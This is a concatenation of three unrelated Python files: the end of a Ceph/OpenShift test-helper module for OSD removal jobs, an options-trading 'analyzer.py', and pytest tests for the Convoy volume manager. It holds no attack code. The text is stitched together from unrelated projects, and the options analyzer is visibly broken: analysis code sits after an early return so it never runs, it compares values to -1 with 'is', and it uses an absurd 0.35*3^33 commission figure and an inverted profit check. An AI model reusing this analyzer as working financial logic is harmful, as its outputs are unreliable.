for pod_obj in pod_objs:
resource_name = pod_obj.name
tolerations = pod_obj.get().get("spec").get("tolerations")
for key in tolerations:
if key["key"] == toleration_key:
flag = True
if flag:
logger.info(f"The Toleration {toleration_key} exists on {resource_name}")
else:
logger.error(
f"The pod {resource_name} does not have toleration {toleration_key}"
)
def run_osd_removal_job(osd_id):
"""
Run the ocs-osd-removal job
Args:
osd_id (str): The osd id
Returns:
ocs_ci.ocs.resources.ocs.OCS: The ocs-osd-removal job object
"""
ocp_version = float(get_ocp_version())
if ocp_version >= 4.6:
cmd = f"process ocs-osd-removal -p FAILED_OSD_IDS={osd_id} -o yaml"
else:
cmd = f"process ocs-osd-removal -p FAILED_OSD_ID={osd_id} -o yaml"
logger.info(f"Executing OSD removal job on OSD-{osd_id}")
ocp_obj = ocp.OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE)
osd_removal_job_yaml = ocp_obj.exec_oc_cmd(cmd)
osd_removal_job = OCS(**osd_removal_job_yaml)
osd_removal_job.create(do_reload=False)
return osd_removal_job
def verify_osd_removal_job_completed_successfully(osd_id):
"""
Verify that the ocs-osd-removal job completed successfully
Args:
osd_id (str): The osd id
Returns:
bool: True, if the ocs-osd-removal job completed successfully. False, otherwise
"""
logger.info("Getting the ocs-osd-removal pod name")
osd_removal_pod_name = get_osd_removal_pod_name(osd_id)
osd_removal_pod_obj = get_pod_obj(
osd_removal_pod_name, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
is_completed = osd_removal_pod_obj.ocp.wait_for_resource(
condition=constants.STATUS_COMPLETED, resource_name=osd_removal_pod_name
)
if not is_completed:
logger.info("ocs-osd-removal pod job failed to complete")
return False
# Verify OSD removal from the ocs-osd-removal pod logs
logger.info(f"Verifying removal of OSD from {osd_removal_pod_name} pod logs")
logs = get_pod_logs(osd_removal_pod_name)
pattern = f"purged osd.{osd_id}"
if not re.search(pattern, logs):
logger.warning(
f"Didn't find the removal of OSD from {osd_removal_pod_name} pod logs"
)
return False
return True
def delete_osd_removal_job(osd_id):
"""
Delete the ocs-osd-removal job.
Args:
osd_id (str): The osd id
Returns:
bool: True, if the ocs-osd-removal job deleted successfully. False, otherwise
"""
osd_removal_job = get_job_obj(
f"ocs-osd-removal-{osd_id}", namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
osd_removal_job.delete()
try:
osd_removal_job.ocp.wait_for_delete(resource_name=f"ocs-osd-removal-{osd_id}")
except TimeoutError:
logger.warning(f"ocs-osd-removal-{osd_id} job did not deleted successfully")
return False
return True
def get_deployment_name(pod_name):
"""
Get the deployment of the pod.
Args:
pod_name (str): The pod's name.
Returns:
The deployment of the specific pod name
"""
return "-".join(pod_name.split("-")[:-2])
def get_osd_pod_id(osd_pod):
"""
Get the osd pod id
Args:
osd_pod (ocs_ci.ocs.resources.pod.Pod): The osd pod object
Returns:
str: The osd pod id
"""
return osd_pod.get().get("metadata").get("labels").get("ceph-osd-id")
|
analyzer.py | # -*- coding: UTF-8 -*-
import math
import time
import queue
import threading
from multiprocessing import Pool, TimeoutError
from optionstrader.database import Database
from optionstrader.config import Config
from optionstrader.customlogging import CustomLog
from optionstrader.customlogging import Analyzed_Ticker_Stream
class Analyzer:
def __init__(self):
self.database = Database()
self.config = Config()
self.log = CustomLog()
self.log_analysis = Analyzed_Ticker_Stream()
self.minimum_contract_cost_threshold = self.config.get_minimum_contract_cost_threshold()
# config
# Max number of option chains to analyze, per symbol
self.max_num_option_chains = 500
# About 3.5 days in seconds = 302400
self.option_chain_timestamp_threshold = 300000
self.db_update_queue = queue.Queue()
# Decorator to time each method
# Will be used for future optimization
def timeit(method):
def timed(*args, **kw):
ts = time.time()
result = method(*args, **kw)
ticker = args[1]
te = time.time()
completion_time_ms = round(te-ts, 4)*1000
completion_time_mcs = round(te-ts, 4)*1000000
avg_one_option_analyzed_time = -1
if result is -1:
log_msg = "Warning: Wasting resources. Symbol '{ticker}' does not have option chains.".format(ticker=ticker)
log = CustomLog()
log.debug(log_msg)
return result
if result is not -1: avg_one_option_analyzed_time = completion_time_mcs / result
log_msg = "Completed in {completion_time_ms} ms - analyzer.{0}(ticker='{ticker}'). Avg 1 option scanned in {avg_one_option_analyzed_time} microseconds".format(
method.__name__,
completion_time_ms=completion_time_ms,
ticker=ticker,
avg_one_option_analyzed_time=avg_one_option_analyzed_time)
log = CustomLog()
log.debug(log_msg)
return result
return timed
def save_to_db(self):
queue_item = self.db_update_queue.get()
log_msg = queue_item
return log_msg
def start_db_update_queue_workers(self):
processes = 10
pool = Pool(processes)
log_msg = "TESTING"
self.log.debug(log_msg)
log_msg = "Starting pool of {} processes".format(processes)
self.log.debug(log_msg)
result = pool.apply_async(self.save_to_db)
self.log.debug(log_msg)
return True
def get_final_analysis(self, percentage_change, magic_number):
# We want to return the results for each possible_expiration_dates
# Example: We want to return the results of the provided parameters for
# the week of 02/17/2017 and for the week of 02/24/2017, if
# possible_expiration_dates had only those two dates in it.
return
def sanitize_stock_price(self, symbol):
# TODO
# Implement later
# I'll use this function to ensure that the stock price is not widly
# above or below the current stock price.
stock_price = self.database.get_current_stock_price(symbol)
return stock_price
def analyze_all_option_chains(self):
# There's two ways to analyze all option chains
# - inside_out: Scans for option chains for the earliest option expiration date, then goes outwards.
# Scan start with the AAAA ends with ZZZZ.
# - outside_in: Scans for option chains for the farthest option expiration date (set limit manually Eg- 6 months out),
# then goes inwards. Scan start with the AAAA ends with ZZZZ.
# We will later want the ability to prioritize the scan of the option chains of specific companies.
# We need to speed up this process by 2 orders of magnitude.
# Goal: 1.65 sec for maximum_number_of_option_chains=10, option_chain_timestamp_threshold=30000
list_of_tickers = self.database.get_list_of_tickers(query_type='options_only')
log_msg = "Number of DISTINCT symbols to analyze: {0}".format(len(list_of_tickers))
for ticker in list_of_tickers:
self.analyze_all_option_chains_for_ticker(ticker)
return True
@timeit
def analyze_all_option_chains_for_ticker(self, ticker, *args):
current_timestamp = int(time.time())
time_threshold = self.option_chain_timestamp_threshold
max_num_option_chains = self.max_num_option_chains
# Improve efficiency here
option_chains = self.database.query_option_chains_for_analysis(ticker,
current_timestamp,
time_threshold,
max_num_option_chains)
num_option_chains = len(option_chains)
log_msg = "{0} chains for symbol '{1}', time_threshold : {2}, max_num_option_chains : {3}".format(
num_option_chains,
ticker,
time_threshold,
max_num_option_chains)
self.log.debug(log_msg)
# Improve efficiency here
result = self.analyze_option_chains(option_chains)
if num_option_chains <= 0: return -1
# returning the num_option_chains so that performance can be tuned.
return num_option_chains
#except:
# log_msg = "ERROR Processing option_chain for ticker {0}".format(ticker)
# return False
def async_analyze_option_chains(self, option_chains):
return
def analyze_option_chains(self, option_chains):
# option_chains is a list of all option chains for a given ticker,
# soreted by timestamp in descending order
# Spawn a new thread
#while option_chains
#for option_chain in option_chains:
#pass
option_chain_queue = queue.Queue()
for option_chain in option_chains:
option_chain_queue.put(option_chain)
while option_chain_queue.qsize() > 0:
max_number_threads = 16
for i in range(max_number_threads):
thread = threading.Thread(target=self.async_analyze_option_chains, args=(option_chain_queue.get(),))
thread.start()
# All 8 threads have completed the job
break
return False
for option_chain in option_chains:
result = self.analyze_single_option_chain(option_chain)
if result == False:
# There was an error analyzing option chain 'option_chain'
log_msg = "Error! There was an error analyzing option chain "
self.log.debug(log_msg)
# Change later
raise SyntaxError
return False
# main thread
# poll to ensure that the other threads are executing properly
return True
def analyze_single_option_chain(self, option_chain):
# Currently using the ask price for the option chain in analysis
#log_msg = "type(option_chain) : {}".format(type(option_chain))
# First analyze for each percentage Increase
# Then analyze examples for each number contracts array
# We want to make sure that the 'last_' price is within reason. We don't want to
# pay 100x the average price of the item.
symbol = option_chain['underlying']
#self.log.debug("SYMBOL: {}".format(symbol))
current_stock_price = self.sanitize_stock_price(symbol)
#self.log.debug("current_stock_price: {}".format(current_stock_price))
# strike_price = float(option_chain['strikePrice'])
strike_price = option_chain['strike']
#log_msg = "Strike Price: {}".format(option_chain['strike'])
# for calulating the price per contract, we should take into consideration both the bid and the ask
price_per_contract_bid = float(option_chain['bid'])
price_per_contract_ask = float(option_chain['ask'])
#log_msg = "price_per_contract_bid: {}".format(price_per_contract_bid)
#log_msg = "price_per_contract_ask: {}".format(price_per_contract_ask)
# iterate for each of these thresholds
stock_price_increase_total = [1.0, 1.5, 2.0, 2.25, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0]
for stock_price_increase in stock_price_increase_total:
percentage_increase_analysis = {}
percentage_increase_analysis['timestamp'] = time.time()
#log_msg = "timestamp: {}".format(time.time())
percentage_increase_analysis['expiration_date'] = option_chain['expiration_date']
percentage_increase_analysis['symbol'] = symbol
#log_msg = "symbol: {}".format(symbol)
percentage_increase_analysis['option_type'] = option_chain['option_type']
percentage_increase_analysis['stock_price_increase'] = stock_price_increase
#log_msg = "stock_price_increase: {}".format(stock_price_increase)
stock_exercise_price = current_stock_price * (1 + (float(stock_price_increase)/100))
percentage_increase_analysis['stock_exercise_price'] = stock_exercise_price
#log_msg = "stock_exercise_price: {}".format(stock_exercise_price)
#log_msg = stock_exercise_price
theoretical_commission_fees = 0.35 * math.pow(3,33)
contract_price_per_share = stock_exercise_price - strike_price
if contract_price_per_share < 0:
contract_price_per_share = 0
# This is the potential value of the contract near the expiration date.
# This is the price that the option should be sold at
percentage_increase_analysis['contract_price_per_share'] = contract_price_per_share
#log_msg = "contract_price_per_share: {}".format(contract_price_per_share)
# This is the price per contract that the analysis was performed at
# This is how much the user should buy the contract for
percentage_increase_analysis['price_per_contract_ask'] = price_per_contract_ask
#magic_number = contract_price_per_share
try:
magic_number = ((contract_price_per_share * math.pow(3,33)) - ((price_per_contract_ask * math.pow(3,33))-(theoretical_commission_fees)))/(price_per_contract_ask * math.pow(3,33))
except:
magic_number = -100
percentage_increase_analysis['magic_number'] = magic_number
#log_msg = "magic_number: {}".format(magic_number)
# Potential Profit
percentage_increase_analysis['strike_price'] = strike_price
#log_msg = "strike_price: {}".format(strike_price)
number_contracts_array = [1, 10, 100]
for total_number_of_contracts in number_contracts_array:
#log_msg = "---"
#total_number_of_contracts = 1
total_number_of_shares = total_number_of_contracts * 100
total_price_paid = price_per_contract_ask * total_number_of_shares
percentage_increase_analysis['total_price_paid_{0}x'.format(total_number_of_contracts)] = total_price_paid
#log_msg = "total_price_paid_{0}x: {1}".format(total_number_of_contracts, total_price_paid)
if (0.35 * total_number_of_contracts) < self.minimum_contract_cost_threshold:
total_commission_cost = 5.00
else:
total_commission_cost = 0.35 * total_number_of_contracts
if ((price_per_contract_ask * total_number_of_shares) - total_price_paid - total_commission_cost) > 0:
potential_profit = 0
else:
potential_profit = (contract_price_per_share * total_number_of_shares) - total_price_paid - total_commission_cost
percentage_increase_analysis['potential_profit_{0}x'.format(total_number_of_contracts)] = potential_profit
#log_msg = "potential_profit_{0}x : {1}".format(total_number_of_contracts, potential_profit)
try:
risk_percentage = round((total_price_paid / potential_profit) * 100, 2)
except:
risk_percentage = -100.0
percentage_increase_analysis['risk_percentage_{0}x'.format(total_number_of_contracts)] = risk_percentage
#log_msg = "risk_percentage_{0}x : {1}".format(total_number_of_contracts, risk_percentage)
# uncomment below for all percentage_increase
#log_msg = "------------------"
#log_msg = percentage_increase_analysis
# update database
# TODO
#self.add_to_db_update_queue(percentage_increase_analysis)
self.database.update_option_chain_with_analysis(percentage_increase_analysis)
# percentage_increase_analysis is the variable used to determine if the choice is good or not
#self.log.debug("percentage_increase_analysis:")
#self.log.debug(percentage_increase_analysis)
# Uncommenting until further testing has been done. TODO finish this part.
# TODO finish the analysis part
#self.get_recommended_option_purchase(percentage_increase_analysis)
return True
def get_recommended_option_purchase(self, percentage_increase_analysis):
# There is similar code in the database.py module
# This is used for analyzing the datastream to check if an option_chain
# meets certain criteria for a "good" match
#self.log.debug("Checking percentage_increase_analysis...")
if (0 <= percentage_increase_analysis['total_price_paid_1x'] <= 100) == False:
return None
if (50 <= percentage_increase_analysis['potential_profit_1x'] <= 100) == False:
return None
if (0 <= percentage_increase_analysis['stock_price_increase'] <= 3.5) == False:
return None
if (3 <= percentage_increase_analysis['magic_number'] <= 10) == False:
return None
if (0 <= percentage_increase_analysis['risk_percentage_1x'] <= 18) == False:
return None
# If the option_chain has made it through this tribunal, I want to know about it
#
self.log.debug("Preferred Analysis Detected in percentage_increase_analysis!")
self.log.debug("Sending details to analysis log...")
self.log_analysis.debug("PREFERRED ANALYSIS DETECTED".center(50, "-"))
self.log_analysis.debug(percentage_increase_analysis)
return percentage_increase_analysis
def add_to_db_update_queue(self, percentage_increase_analysis):
#self.database.update_option_chain_with_analysis(percentage_increase_analysis)
self.db_update_queue.put(percentage_increase_analysis)
return True
|
test_main.py | #!/usr/bin/python
import subprocess
import os
import json
import pytest
import uuid
import time
import sys
import threading
import shutil
from convoy import VolumeManager
TEST_ROOT = "/tmp/convoy_test/"
CFG_ROOT = os.path.join(TEST_ROOT, "convoy")
PID_FILE = os.path.join(TEST_ROOT, "convoy.pid")
LOG_FILE= os.path.join(TEST_ROOT, "convoy.log")
TEST_SNAPSHOT_FILE = "snapshot.test"
CONTAINER_NAME = "convoy-test"
CONTAINER = "yasker/convoy"
CONVOY_CONTAINER_CMD = ["docker", "exec", CONTAINER_NAME, "convoy"]
CONVOY_BINARY = [os.path.abspath("../../bin/convoy")]
DM = "devicemapper"
DM_ROOT = os.path.join(CFG_ROOT, DM)
TEST_THREAD_COUNT = 100
TEST_LOOP_COUNT = 100
VFS_BACKUP_DIR = os.path.join(TEST_ROOT, "Backup")
VFS_DEST = "vfs://" + VFS_BACKUP_DIR
VFS = "vfs"
VFS_ROOT = os.path.join(CFG_ROOT, VFS)
VFS_VOLUME_PATH = os.path.join(TEST_ROOT, "vfs-volumes")
EBS = "ebs"
ENV_TEST_AWS_REGION = "CONVOY_TEST_AWS_REGION"
ENV_TEST_AWS_BUCKET = "CONVOY_TEST_AWS_BUCKET"
S3_PATH = "test/volume/"
DD_BLOCK_SIZE = 4096
POOL_NAME = "convoy_test_pool"
DATA_FILE = "data.vol"
METADATA_FILE = "metadata.vol"
DATA_DEVICE_SIZE = 2147483648
METADATA_DEVICE_SIZE = 52428800
DM_DIR = "/dev/mapper"
DM_BLOCK_SIZE = 2097152
EMPTY_FILE_SIZE = 104857600
DEFAULT_VOLUME_SIZE = "1073741824"
VOLUME_SIZE_IOPS = "5G"
VOLUME_IOPS = "100"
VOLUME_SIZE_BIG_Bytes = "2147483648"
VOLUME_SIZE_BIG = "2G"
VOLUME_SIZE_SMALL = "1073741824"
VOLUME_SIZE_6M = "6M"
EBS_DEFAULT_VOLUME_TYPE = "standard"
VM_IMAGE_FILE = "disk.img"
data_dev = ""
metadata_dev = ""
mount_cleanup_list = []
dm_cleanup_list = []
volume_cleanup_list = []
test_ebs = False
test_container = False
def create_empty_file(filepath, size):
subprocess.check_call(["truncate", "-s", str(size), filepath])
assert os.path.exists(filepath)
def attach_loopback_dev(filepath):
dev = subprocess.check_output(["losetup", "-v", "-f",
filepath]).strip().split(" ")[3]
assert dev.startswith("/dev/loop")
return dev
def detach_loopback_dev(dev):
subprocess.check_output(["losetup", "-d", dev])
def mount_dev(dev, mountpoint):
subprocess.check_call(["mount", dev, mountpoint])
mount_cleanup_list.append(mountpoint)
def umount_dev(mountpoint):
subprocess.check_call(["umount", mountpoint])
mount_cleanup_list.remove(mountpoint)
def setup_module():
global test_ebs
test_ebs = pytest.config.getoption("ebs")
global test_container
test_container = pytest.config.getoption("container")
if os.path.exists(TEST_ROOT):
subprocess.check_call(["rm", "-rf", TEST_ROOT])
os.makedirs(TEST_ROOT)
assert os.path.exists(TEST_ROOT)
os.makedirs(VFS_BACKUP_DIR)
assert os.path.exists(VFS_BACKUP_DIR)
data_file = os.path.join(TEST_ROOT, DATA_FILE)
create_empty_file(data_file, DATA_DEVICE_SIZE)
global data_dev
data_dev = attach_loopback_dev(data_file)
metadata_file = os.path.join(TEST_ROOT, METADATA_FILE)
create_empty_file(metadata_file, METADATA_DEVICE_SIZE)
global metadata_dev
metadata_dev = attach_loopback_dev(metadata_file)
global v
cmdline = []
if test_container:
v = VolumeManager(CONVOY_CONTAINER_CMD, TEST_ROOT)
cmdline = ["convoy-start",
"--mnt-ns", "/host/proc/1/ns/mnt"]
else:
v = VolumeManager(CONVOY_BINARY, TEST_ROOT)
cmdline = ["daemon"]
cmdline += [
"--root", CFG_ROOT,
"--log", LOG_FILE,
"--drivers=" + DM,
"--driver-opts", "dm.datadev=" + data_dev,
"--driver-opts", "dm.metadatadev=" + metadata_dev,
"--driver-opts", "dm.thinpoolname=" + POOL_NAME,
"--driver-opts", "dm.defaultvolumesize=" + DEFAULT_VOLUME_SIZE,
"--drivers=" + VFS,
"--driver-opts", "vfs.path=" + VFS_VOLUME_PATH]
if test_ebs:
cmdline += ["--drivers=ebs",
"--driver-opts",
"ebs.defaultvolumesize=" + DEFAULT_VOLUME_SIZE,
"--driver-opts",
"ebs.defaultvolumetype=" + EBS_DEFAULT_VOLUME_TYPE]
if test_container:
v.start_server_container(CONTAINER_NAME, CFG_ROOT, TEST_ROOT, CONTAINER, cmdline)
else:
v.start_server(PID_FILE, cmdline)
dm_cleanup_list.append(POOL_NAME)
wait_for_daemon()
def detach_all_lodev(keyword):
output = subprocess.check_output(["losetup", "-a"])
lines = output.splitlines()
for line in lines:
if line.find(keyword) != -1:
detach_loopback_dev(line.split(":")[0].strip())
def teardown_module():
if test_container:
code = v.stop_server_container(CONTAINER_NAME)
else:
code = v.stop_server(PID_FILE)
if code != 0:
print "Something wrong when tearing down, continuing with code ", code
while mount_cleanup_list:
code = subprocess.call(["umount", mount_cleanup_list.pop()])
if code != 0:
print "Something wrong when tearing down, continuing with code", code
while dm_cleanup_list:
code = subprocess.call(["dmsetup", "remove", "--retry",
dm_cleanup_list.pop()])
if code != 0:
print "Something wrong when tearing down, continuing with code ", code
code = subprocess.call(["dmsetup", "remove", "--retry", POOL_NAME])
if code != 0:
print "Something wrong when tearing down, continuing with code ", code
code = subprocess.call(["losetup", "-d", data_dev, metadata_dev])
if code != 0:
print "Something wrong when tearing down, continuing with code", code
detach_all_lodev(TEST_ROOT)
def wait_for_daemon():
while True:
try:
data = v.server_info()
break
except subprocess.CalledProcessError:
print "Fail to communicate with daemon"
check_result = 0
if test_container:
check_result = v.check_server_container(CONTAINER_NAME)
else:
check_result = v.check_server(PID_FILE)
if check_result != 0:
print "Server failed to start"
teardown_module()
assert False
time.sleep(1)
info = json.loads(data)
success = True
try:
success = bool(success and DM in info["General"]["DriverList"])
success = bool(success and VFS in info["General"]["DriverList"])
success = bool(success and info["General"]["Root"] == CFG_ROOT)
success = bool(success and info["General"]["DefaultDriver"] == DM)
success = bool(success and info[DM]["Driver"] == "devicemapper")
success = bool(success and info[DM]["Root"] == DM_ROOT)
success = bool(success and info[DM]["DataDevice"] == data_dev)
success = bool(success and info[DM]["MetadataDevice"] == metadata_dev)
success = bool(success and info[DM]["ThinpoolDevice"] == os.path.join(DM_DIR, POOL_NAME))
success = bool(success and info[DM]["ThinpoolSize"] == str(DATA_DEVICE_SIZE))
success = bool(success and info[DM]["ThinpoolBlockSize"] == str(DM_BLOCK_SIZE))
success = bool(success and info[DM]["DefaultVolumeSize"] == DEFAULT_VOLUME_SIZE)
success = bool(success and info[VFS]["Root"] == VFS_ROOT)
success = bool(success and info[VFS]["Path"] == VFS_VOLUME_PATH)
if test_ebs:
success = bool(success and info[EBS]["DefaultVolumeSize"] == DEFAULT_VOLUME_SIZE)
success = bool(success and info[EBS]["DefaultVolumeType"] == EBS_DEFAULT_VOLUME_TYPE)
except:
success = False
if not success:
teardown_module()
assert False
@pytest.yield_fixture(autouse=True)
def cleanup_test():
yield
filenames = os.listdir(CFG_ROOT)
leftover_volumes = []
for filename in filenames:
if filename.startswith('volume'):
leftover_volumes.append(filename)
while volume_cleanup_list:
v = volume_cleanup_list.pop()
try:
delete_volume(v)
except:
print "Failed to delete volume ", v
if len(leftover_volumes) != 0:
print leftover_volumes
assert False
def create_volume(size = "", name = "", backup = "", driver = "",
volume_id = "", volume_type = "", iops = "", forvm = False):
name = v.create_volume(size, name, backup, driver,
volume_id, volume_type, iops, forvm)
if driver == "" or driver == DM:
dm_cleanup_list.append(name)
volume_cleanup_list.append(name)
return name
def delete_volume(name, ref_only = False):
v.delete_volume(name, ref_only)
try:
dm_cleanup_list.remove(name)
except ValueError:
pass
volume_cleanup_list.remove(name)
def mount_volume_with_path(name):
mount_dir = v.mount_volume_with_path(name)
mount_cleanup_list.append(mount_dir)
return mount_dir
def mount_volume(name):
mount_dir = v.mount_volume(name)
mount_cleanup_list.append(mount_dir)
return mount_dir
def umount_volume(name, mount_dir):
v.umount_volume(name)
mount_cleanup_list.remove(mount_dir)
def test_volume_crud():
volume_crud_test(DM, vmTest = False)
volume_crud_test(VFS, sizeTest = False)
def volume_crud_test(drv, sizeTest = True, vmTest = True):
name1 = create_volume(driver=drv)
name2 = create_volume(driver=drv)
if sizeTest:
name3 = create_volume(VOLUME_SIZE_BIG, driver = drv)
name4 = create_volume(VOLUME_SIZE_SMALL, driver = drv)
delete_volume(name4)
delete_volume(name3)
if vmTest:
name3 = create_volume(driver = drv, forvm = True)
name4 = create_volume(driver = drv, forvm = True)
delete_volume(name4)
delete_volume(name3)
delete_volume(name2)
delete_volume(name1)
@pytest.mark.skipif(not pytest.config.getoption("ebs"),
reason="--ebs was not specified")
def test_ebs_volume_crud():
# need to test volume type and create volume from existed EBS volume feature
name1 = create_volume(driver=EBS)
name2 = create_volume(size=VOLUME_SIZE_SMALL, driver=EBS, volume_type="gp2")
name3 = create_volume(size=VOLUME_SIZE_IOPS, driver=EBS, volume_type="io1",
iops="100")
volume3 = v.inspect_volume(name3)
ebs_volume_id3 = volume3["DriverInfo"]["EBSVolumeID"]
delete_volume(name3, ref_only = True)
name3 = create_volume(driver=EBS, volume_id=ebs_volume_id3)
delete_volume(name3)
delete_volume(name2)
delete_volume(name1)
def test_vfs_delete_volume_ref_only():
name = create_volume(driver=VFS)
insp = v.inspect_volume(name)
path = insp["DriverInfo"]["Path"]
assert os.path.exists(path)
filename = "testfile"
test_file = os.path.join(path,filename)
with open(test_file, "w") as f:
subprocess.check_call(["echo", "This is volume test file"], stdout=f)
assert os.path.exists(test_file)
delete_volume(name, ref_only = True)
assert os.path.exists(test_file)
os.remove(test_file)
def test_volume_name():
volume_name_test(DM)
volume_name_test(VFS)
def volume_name_test(drv):
vol_name1 = "vol.1_1-0"
vol_name2 = "vol.2_2-0"
vol = create_volume(name=vol_name1, driver=drv)
vols = v.list_volumes()
assert vols[vol]["Name"] == vol_name1
assert vols[vol]["Driver"] == drv
assert vols[vol]["CreatedTime"] != ""
with pytest.raises(subprocess.CalledProcessError):
new_name = create_volume(name=vol_name1, driver=drv)
with pytest.raises(subprocess.CalledProcessError):
new_name = create_volume(driver="randomdriver")
delete_volume(vol_name1)
vols = v.list_volumes()
assert vol not in vols
vol1 = create_volume(name=vol_name1, driver=drv)
vol2 = create_volume(name=vol_name2, driver=drv)
vols = v.list_volumes()
assert vols[vol1]["Name"] == vol_name1
assert vols[vol2]["Name"] == vol_name2
assert vols[vol1]["CreatedTime"] != ""
assert vols[vol2]["CreatedTime"] != ""
delete_volume(vol1)
delete_volume(vol_name2)
def mount_volume_and_create_file(name, filename):
# with format
volume_mount_dir = mount_volume(name)
test_file = os.path.join(volume_mount_dir,filename)
with open(test_file, "w") as f:
subprocess.check_call(["echo", "This is volume test file"], stdout=f)
assert os.path.exists(test_file)
umount_volume(name, volume_mount_dir)
# Doesn't work with current VFS implmentation, since it won't really mount
#assert not os.path.exists(test_file)
def test_volume_mount():
volume_mount_test(DM)
if test_ebs:
volume_mount_test(EBS)
# skip the vfs mount test because we only pass the original volume path as
# mount path, not really done any mount work now
def volume_mount_test(drv):
vol = create_volume(driver=drv)
# with format
filename = "test"
mount_volume_and_create_file(vol, filename)
# without format
volume_mount_dir = mount_volume_with_path(vol)
test_file = os.path.join(volume_mount_dir, filename)
assert os.path.exists(test_file)
umount_volume(vol, volume_mount_dir)
assert not os.path.exists(test_file)
# auto mount
volume_mount_dir = mount_volume(vol)
test_file = os.path.join(volume_mount_dir, filename)
assert os.path.exists(test_file)
umount_volume(vol, volume_mount_dir)
assert not os.path.exists(test_file)
delete_volume(vol)
def test_volume_vm_mount():
volume_vm_test(VFS)
def volume_vm_test(drv):
vol = create_volume(driver = drv, size = VOLUME_SIZE_SMALL, forvm = True)
mount_dir = mount_volume(vol)
image_filepath = os.path.join(mount_dir, VM_IMAGE_FILE)
assert os.path.exists(image_filepath)
size = os.stat(image_filepath).st_size
assert str(size) == VOLUME_SIZE_SMALL
umount_volume(vol, mount_dir)
delete_volume(vol)
def test_volume_list():
volume_list_driver_test(DM)
volume_list_driver_test(VFS, False)
if test_ebs:
volume_list_driver_test(EBS)
def volume_list_driver_test(drv, check_size = True):
volumes = v.list_volumes()
assert len(volumes) == 0
vol1 = create_volume(driver=drv)
vol2 = create_volume(driver=drv)
if check_size:
vol3 = create_volume(VOLUME_SIZE_BIG, driver=drv)
vol4 = create_volume(VOLUME_SIZE_SMALL, driver=drv)
volume = v.inspect_volume(vol1)
assert volume["Name"] == vol1
if check_size:
assert volume["DriverInfo"]["Size"] == DEFAULT_VOLUME_SIZE
volume = v.inspect_volume(vol2)
assert volume["Name"] == vol2
if check_size:
assert volume["DriverInfo"]["Size"] == DEFAULT_VOLUME_SIZE
if check_size:
volumes = v.list_volumes()
assert volumes[vol1]["DriverInfo"]["Size"] == DEFAULT_VOLUME_SIZE
assert volumes[vol2]["DriverInfo"]["Size"] == DEFAULT_VOLUME_SIZE
assert volumes[vol3]["DriverInfo"]["Size"] == VOLUME_SIZE_BIG_Bytes
assert volumes[vol4]["DriverInfo"]["Size"] == VOLUME_SIZE_SMALL
delete_volume(vol4)
delete_volume(vol3)
delete_volume(vol2)
delete_volume(vol1)
def test_snapshot_crud():
snapshot_crud_test(DM)
snapshot_crud_test(VFS)
def snapshot_crud_test(driver):
volume_name = create_volume(VOLUME_SIZE_SMALL, name="vol1", driver=driver)
snapshot = v.create_snapshot(volume_name)
v.delete_snapshot(snapshot)
delete_volume(volume_name)
# delete snapshot automatically with volume
volume_name = create_volume(VOLUME_SIZE_SMALL, name="vol1", driver=driver)
snap1 = v.create_snapshot(volume_name)
snap2 = v.create_snapshot(volume_name)
snap3 = v.create_snapshot(volume_name)
v.delete_snapshot(snap1)
v.delete_snapshot(snap2)
delete_volume(volume_name)
def test_snapshot_name():
snapshot_name_test(DM)
snapshot_name_test(VFS)
def snapshot_name_test(driver):
volume_name = create_volume(VOLUME_SIZE_SMALL, driver=driver)
snap1_name = "snap1"
snap1 = v.create_snapshot(volume_name, name=snap1_name)
assert snap1_name == snap1
vols = v.list_volumes()
s = vols[volume_name]["Snapshots"][snap1]
assert s["Name"] == snap1_name
assert s["DriverInfo"]["Driver"] == driver
assert s["CreatedTime"] != ""
with pytest.raises(subprocess.CalledProcessError):
new_name = v.create_snapshot(volume_name, name=snap1_name)
v.delete_snapshot(snap1)
delete_volume(volume_name)
def test_snapshot_list():
snapshot_list_test(DM)
snapshot_list_test(VFS, False)
def snapshot_list_test(driver, check_size = True):
volume1_name = create_volume(VOLUME_SIZE_SMALL, name = "volume1", driver=driver)
volume2_name = create_volume(VOLUME_SIZE_BIG, driver=driver)
with pytest.raises(subprocess.CalledProcessError):
snapshot = v.inspect_snapshot(str(uuid.uuid1()))
with pytest.raises(subprocess.CalledProcessError):
volume = v.inspect_snapshot(str(uuid.uuid1()))
snap0_vol1 = v.create_snapshot(volume1_name, "snap0_vol1")
assert snap0_vol1 == "snap0_vol1"
snapshot = v.inspect_snapshot("snap0_vol1")
assert snapshot["VolumeName"] == volume1_name
if check_size:
assert str(snapshot["DriverInfo"]["Size"]) == VOLUME_SIZE_SMALL
assert snapshot["Name"] == "snap0_vol1"
snap1_vol1 = v.create_snapshot(volume1_name)
snap2_vol1 = v.create_snapshot(volume1_name)
snap1_vol2 = v.create_snapshot(volume2_name, "snap1_vol2")
assert snap1_vol2 == "snap1_vol2"
snap2_vol2 = v.create_snapshot(volume2_name, "snap2_vol2")
assert snap2_vol2 == "snap2_vol2"
snap3_vol2 = v.create_snapshot(volume2_name, "snap3_vol2")
assert snap3_vol2 == "snap3_vol2"
volume = v.inspect_volume(volume2_name)
assert snap1_vol2 in volume["Snapshots"]
assert volume["Snapshots"][snap1_vol2]["Name"] == "snap1_vol2"
assert volume["Snapshots"][snap1_vol2]["CreatedTime"] != ""
assert snap2_vol2 in volume["Snapshots"]
assert volume["Snapshots"][snap2_vol2]["Name"] == "snap2_vol2"
assert volume["Snapshots"][snap2_vol2]["CreatedTime"] != ""
assert snap3_vol2 in volume["Snapshots"]
assert volume["Snapshots"][snap3_vol2]["Name"] == "snap3_vol2"
assert volume["Snapshots"][snap3_vol2]["CreatedTime"] != ""
volumes = v.list_volumes()
assert snap0_vol1 in volumes[volume1_name]["Snapshots"]
assert snap1_vol1 in volumes[volume1_name]["Snapshots"]
assert snap2_vol1 in volumes[volume1_name]["Snapshots"]
assert snap1_vol2 in volumes[volume2_name]["Snapshots"]
assert snap2_vol2 in volumes[volume2_name]["Snapshots"]
assert snap3_vol2 in volumes[volume2_name]["Snapshots"]
v.delete_snapshot(snap0_vol1)
with pytest.raises(subprocess.CalledProcessError):
snapshot = v.inspect_snapshot(snap0_vol1)
v.delete_snapshot(snap1_vol1)
v.delete_snapshot(snap2_vol1)
v.delete_snapshot(snap1_vol2)
v.delete_snapshot(snap2_vol2)
v.delete_snapshot(snap3_vol2)
delete_volume(volume2_name)
delete_volume(volume1_name)
@pytest.mark.skipif(not pytest.config.getoption("ebs"),
reason="--ebs was not specified")
